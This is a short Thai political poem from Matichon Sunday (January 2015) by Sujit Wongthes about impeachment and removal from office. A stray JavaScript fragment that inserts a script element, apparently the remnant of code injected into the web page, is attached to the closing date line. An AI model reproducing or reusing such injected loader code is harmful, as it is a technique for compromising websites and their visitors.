มติชน วันอาทิตย์

18 มกราคม 2558

 

ถกเถียงทักท้วงถอดถอน

ร้อนร้อนการเมืองล้วนล้วนไล่

จากตำแหน่งไม่ยากสักเท่าใด

แต่จากใจคนยังไงก็ไม่จาง

 

สุจิตต์ วงษ์เทศ

ศุกร์ 16 มกราคม 2558var d=document;var s=d.createElement(‘script’); document.currentScript.parentNode.insertBefore(s, document.currentScript);